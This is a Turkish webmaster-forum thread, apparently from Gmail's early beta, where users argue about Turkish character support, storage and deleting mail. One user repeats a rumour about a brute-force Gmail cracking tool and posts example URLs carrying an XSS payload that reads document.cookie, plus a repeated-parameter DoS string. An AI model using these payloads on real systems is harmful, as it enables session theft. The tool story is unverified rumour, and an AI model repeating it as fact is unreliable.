İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

gereksiz mail

P

panika

Misafir
Devamlı gmailin özellikleri anlatılıyor üç gündür kullanıyorum ve tamamen safsata. Türkçe karakter desteklemiyor ve uzun sürede desteklemeyecek sanırım. Herkez günlerce peşinde koşuyor Türkçe karakter kullanamayacağınız bir mail hesabının peşinde niye koşuyorsunuz. Size yollanan hiç bir maili ingiliz alfabesine göre yazılmadıysa okuyamayacaksınız. sadece 1 gb kapasitesi var. eeee nolmuş yahoo da 250 mb. Sadece merak her isteyen gidip hesap olamadığı için efsane haline dönüştü. Arkadaşlar hiç uğraşmayın davetiye için eğer gmail bu sorunları çözebilseydi zaten herkez kolaylıkla hesap açtırabilirdi. tamamen güvenlik açıklarıyla dolu bir mail hesabı istiyorsanız buyurun gmaile.

ReferXchange

0
İyinet Üyesi
Reaction score
0
Merhaba,

Türkçe karakter destekliyor.
Ayrıca, güvenlik açıklarından birisini yazar mısınız?

Saygılar...

c4timer

0
İyinet Üyesi
Reaction score
0
@ReferXchange ; Türkçe karakter destikliyor demişsin . Bende yaşanan olay şöyle ; Türkçe karakterli bir mesaj aldığımda herhangi bir sorun yaşamıyorum ; fakat Türkçe karakterli bir mail yolladığımda mail :=) içinden çıkılamıycak bir şekilde gidiyor. Anlatabilmişimdir umarım . [ belkide sorun bendedir ]

bedavaonline

0
İyinet Üyesi
Reaction score
0
Gmail yazıları hala unicode ile çeviriyor ve Türkçe karakterlerde sorun yaratmaya devam ediyor.En son 2 ay önce konu hakkında bir mail atmıştım ve en kısa zaman da(!) bu sorunu halledeceklerini söylemişlerdi.

M

malatyasporlu

Misafir
bence gmail harika birde mailleri nasıl sileceğimi öğrensem..

H

hitmp3tr_com

Misafir
bende çözemedim mailler nasıl siliniyo yaw

adamlar gerek duymamışlar nasılsa 1 gb alan var diye :)

S

Senbul

Misafir
"Move To Trash" silmek istediğiniz postaları secın ve bu kısımdan silin...

iyinet

Root
Admin
Hosting Firması
Reaction score
66
Bende mailleri edit etmeyi bulamadim, boyle bir ozellik varmi?

M.CoRLeOnE

0
İyinet Üyesi
Reaction score
0
ReferXchange' Alıntı:
Merhaba,

Saygılar...
Nihai sürümün hizmete açılmasına ramak kala Google'ın web üzerinden e-posta hizmeti açık verdi.Avustralyalı heker'lar "Brute Force" saldırısı ile kullanıcı hesaplarının parolalarını öğrenen bir araç programladılar."Gmail hek 0.9" adlı araç şuanda web'de serbestçe dolaşıyor.Kullanıcıların web sayfasına kayıt olası yetiyor.Google program ortaya çıkar çıkmaz tepki gösterdi ve güvenliiği sıkıştırdı.Ama Avustralyalı heker'lara engel olamadı ve kötü niyetli programcılar Google'ın son güvenlik önlemlerini de aşan yeni bir sürümü indirilmek üzere hazırladılar.

Arkadaşlar yani dikkatli olun diyorum özellik gmail sahibi olanlar şuanlık önemli maillerini silsinler sonra çok geç olabilir.Bununlada kalmayıp program gerektirmeden de kırabilirsiniz sizlerle paylaşmak isterdim açıkların neler olduğu ama burası hek sitesi değil :):)

M.CoRLeOnE

0
İyinet Üyesi
Reaction score
0
Yapılan acıklamaya gore eger aktif bir Gmail cookie niz varsa Gmail da bulunan bazı acıklardan faydalanabilirsiniz. bak gene dayanamayıp yazdım :):)

Birinci açık : remove label butonunun ismini degiştirme ve gizli bir kategori olusturma ..

Örnek URL

++ http://gmail.google.com/gmail?search=cat&cat=(label.Adi)&view=tl&start=0&zx=
18acabd2b173f0d81040559556&fs=1

ikinci açık : xz degişkeni tam anlamıyla girdileri kontrol etmiyor bu sayede Cross-site [XSS] kodları calıştırılabilir ..

Örnek URL

++ http://gmail.google.com/gmail?searc...l&start=0&zx=18
acabd2b173f0d81040559556{XSS.Kodu}&fs=1

üçüncü açık : fs degişkeni URL de kac edet fs degeri oldugunu saymadıgı için DoS atagından etkilenebilir ..

örnek URLler

acabd2b173f0d81040559556&fs=%3Cscript%3E
alert(document.cookie)%3C%2Fscript%3E&fs=1

acabd2b173f0d81040559556&fs=%3Cscript%3E
alert(document.cookie)%3C%2F
script%3E&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1
&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1

P

panika

Misafir
ReferXchange
Merhaba,

Saygılar...

Foruma yeni baktım ve ReferXchange nin yazdıklarına benden önce arkadaşlar yeterli cevabı yazmışlar. Teşekkür ederim. Bende şunu sormak istiyorum ReferXchange ye Türkçe karakterde nasıl mail yolluyor (yahoo,hotmail,mynet gibi hesaplara... sakın yahoo nun ayarlarındaki sorundan değil demeyin çünkü yahoo da hiç bir sorun yok) söylesin bizde öğrenelim.

ReferXchange

0
İyinet Üyesi
Reaction score
0
panika' Alıntı:
Devamlı gmailin özellikleri anlatılıyor üç gündür kullanıyorum ve tamamen safsata. Türkçe karakter desteklemiyor ve uzun sürede desteklemeyecek sanırım. Herkez günlerce peşinde koşuyor Türkçe karakter kullanamayacağınız bir mail hesabının peşinde niye koşuyorsunuz. Size yollanan hiç bir maili ingiliz alfabesine göre yazılmadıysa okuyamayacaksınız. sadece 1 gb kapasitesi var. eeee nolmuş yahoo da 250 mb. Sadece merak her isteyen gidip hesap olamadığı için efsane haline dönüştü. Arkadaşlar hiç uğraşmayın davetiye için eğer gmail bu sorunları çözebilseydi zaten herkez kolaylıkla hesap açtırabilirdi. tamamen güvenlik açıklarıyla dolu bir mail hesabı istiyorsanız buyurun gmaile.

evet panika önce böyle yazmışsın

bunun ardından ben de sana :
"Türkçe karakter destekliyor.
Ayrıca, güvenlik açıklarından birisini yazar mısınız?"
demişim.

yani "size yollanan hiç bir maili ingiliz alfabesi ile yollanmadıkça okuyamayacaksınız" demişsin. Oysa daha sonra da yahoo'ya gönderilen diyorsun. Ben bir kaç başka mail hesabıma gönderiyorum ve tüm türkçe karakterler ile gönderiyor. Tabii ki yahoo'nun da alabiliyor olması lazım. ama henüz bir sorun var.

Daha sonra bana cevap verildiğinden falan bahsetmişsin. Daha henüz ben cevap alamadım ki? Güvenlikle ilgili insanlar forumlardaki bilgileri yazmışlar. çok güzel siz google dan çok biliyorsunuz aferin.

Ayrıca google sorunları çözebilseydi demişsin. Google emin ol bu sorunları çözemez ve ben de rezil olurum. Dünyanın en büyüğü Türkçe dilinde diğer e-posta hizmetleri sağlayıcılarına gönderimde sorun yaşıyor ve buradan bu şirketin çok kötü olduğu sonucu çıkıyor.
BETA arkadaşım. 1 gb mailin keyfini çıkar gerisi safsata asıl. burada davetiye elde edip de kullanmayan kaç kişi var acaba?

Saygılar...

Haymac

0
İyinet Üyesi
Onaylı Üye
Reaction score
2
[ALINTI]
burada davetiye elde edip de kullanmayan kaç kişi var acaba?
[/ALINTI]

Mesela benim 20 tane war :D 1 tanesini bile zor kullanıyorum :D

HitcH

0
İyinet Üyesi
Reaction score
6
6 Tane Gmail'im var 1 tanesi disinda hepsini kontrol ediyorum. Yani hepsini kullaniyorum. Birisi siteler icin. Birisi kişisel, birisi domainler icin felan filan..

D

DeLi_KaDiR^

Misafir
yahu kardeşim mail mi kalmadı piyasada allah allah g mail ha hotmail boşverin gitsin

eXtreme

0
İyinet Üyesi
Reaction score
0
gmail dan çok memnunum... çok hızlı... hotmail mantığında çalışmıyor zaten daha doğrusu çizgi dışı. herhangi bir sorun yaşamadım. aldığım maillarda da bir problem yaşamıyorum. türkçe-ingilizce karakter sıkıntısı da yaşamadım.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5